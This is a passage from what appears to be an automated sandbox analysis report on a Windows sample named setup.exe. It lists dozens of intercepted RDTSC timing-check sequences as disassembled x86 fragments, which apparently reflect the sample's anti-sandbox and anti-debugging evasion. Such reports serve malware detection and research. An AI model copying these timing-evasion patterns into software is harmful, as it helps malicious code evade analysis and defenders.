0x00000054 jmp 00007FE0B4522B25h 0x00000059 jl 00007FE0B4522B16h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FE0B4522B22h 0x00000067 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E8268A second address: E826EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FE0B4F44DC8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D235Ch], edi 0x00000028 lea eax, dword ptr [ebp+12496014h] 0x0000002e mov edx, dword ptr [ebp+122D38F2h] 0x00000034 nop 0x00000035 ja 00007FE0B4F44DE3h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E826EA second address: E826EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA897 second address: EBA8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA8A0 second address: EBA8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE0B4522B16h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA8AA second address: EBA8B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE0B4F44DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA8B4 second address: EBA8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA8BC second address: EBA8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBA8C0 second address: EBA8F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FE0B4522B28h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007FE0B4522B1Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007FE0B4522B16h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC10DD second address: EC10EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DCDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC10EE second address: EC10FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBFAB3 second address: EBFAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007FE0B4F44DC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBFAC5 second address: EBFAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBFAD0 second address: EBFAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FE0B4F44DC6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FE0B4F44DCCh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBFAEB second address: EBFB03 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0B4522B1Eh 0x00000008 jp 00007FE0B4522B1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBFF5C second address: EBFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EBFF62 second address: EBFF8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE0B4522B22h 0x0000000f jnc 00007FE0B4522B16h 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC0235 second address: EC023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC04E1 second address: EC0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c jng 00007FE0B4522B16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC0503 second address: EC0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC0AA0 second address: EC0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC6BFA second address: EC6C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE0B4F44DC6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC6C04 second address: EC6C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B29h 0x00000007 jns 00007FE0B4522B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FE0B4522B1Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 push ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007FE0B4522B1Dh 0x00000022 jng 00007FE0B4522B16h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC59F2 second address: EC59F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC59F6 second address: EC59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC59FF second address: EC5A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5B52 second address: EC5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FE0B4522B16h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5B60 second address: EC5B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5B64 second address: EC5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5B6E second address: EC5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5B74 second address: EC5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5B78 second address: EC5B86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5B86 second address: EC5B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5E4A second address: EC5E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DCFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC5FAB second address: EC5FB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE0B4522B18h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC6412 second address: EC6422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FE0B4F44DC6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC6422 second address: EC6427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC6427 second address: EC6431 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE0B4F44DD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC6431 second address: EC6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC6446 second address: EC644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC68F7 second address: EC68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC9443 second address: EC9453 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0B4F44DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC95C5 second address: EC95D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE0B4522B1Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC95D7 second address: EC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE0B4F44DD8h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE0B4F44DD4h 0x00000018 pushad 0x00000019 jmp 00007FE0B4F44DD8h 0x0000001e je 00007FE0B4F44DC6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC9633 second address: EC9638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC9638 second address: EC9653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE0B4F44DD3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EC9653 second address: EC965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECC012 second address: ECC016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFDF4 second address: ECFDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFDF8 second address: ECFDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFDFC second address: ECFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFE02 second address: ECFE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE0B4F44DF4h 0x0000000c jmp 00007FE0B4F44DD9h 0x00000011 jmp 00007FE0B4F44DD5h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFE3C second address: ECFE41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFE41 second address: ECFE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFE49 second address: ECFE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FE0B4522B41h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFE85 second address: ECFE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECFE8B second address: ECFE91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECF507 second address: ECF50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ECF50B second address: ECF51B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FE0B4522B1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED4206 second address: ED420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED4361 second address: ED4383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B26h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED44EE second address: ED44F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED44F2 second address: ED4520 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE0B4522B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FE0B4522B20h 0x00000010 jnp 00007FE0B4522B32h 0x00000016 ja 00007FE0B4522B22h 0x0000001c jne 00007FE0B4522B16h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED4687 second address: ED468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED468D second address: ED46B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007FE0B4522B29h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED47E4 second address: ED4815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD6h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jng 00007FE0B4F44DC8h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81E74 second address: E81E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E81E79 second address: E81ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FE0B4F44DC6h 0x00000009 jg 00007FE0B4F44DC6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dx, 9ED0h 0x00000019 mov ebx, dword ptr [ebp+12496053h] 0x0000001f mov edx, 497EB8E2h 0x00000024 mov dword ptr [ebp+12470854h], ecx 0x0000002a add eax, ebx 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FE0B4F44DC8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, 1A64E797h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED53D5 second address: ED53E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FE0B4522B16h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED53E2 second address: ED5402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DD2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED5402 second address: ED5406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED5406 second address: ED5430 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE0B4F44DC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE0B4F44DD8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED9B17 second address: ED9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED9B1C second address: ED9B27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007FE0B4F44DC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED9C98 second address: ED9C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED9E00 second address: ED9E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED9E04 second address: ED9E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: ED9E0A second address: ED9E52 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE0B4F44DDCh 0x00000008 pushad 0x00000009 jmp 00007FE0B4F44DD5h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jne 00007FE0B4F44DC6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a jbe 00007FE0B4F44DCCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EDFB3B second address: EDFB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EDFB3F second address: EDFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FE0B4F44DCCh 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EDFB51 second address: EDFB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE0B4522B16h 0x00000009 jmp 00007FE0B4522B23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EDFB6F second address: EDFB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007FE0B4F44DCEh 0x0000000e jnc 00007FE0B4F44DC8h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE0D51 second address: EE0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE0D55 second address: EE0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE0D5B second address: EE0D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B39 second address: EE6B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B3F second address: EE6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B45 second address: EE6B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B4C second address: EE6B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B5F second address: EE6B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE6B63 second address: EE6B6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE0B4522B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9AAB second address: EE9AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
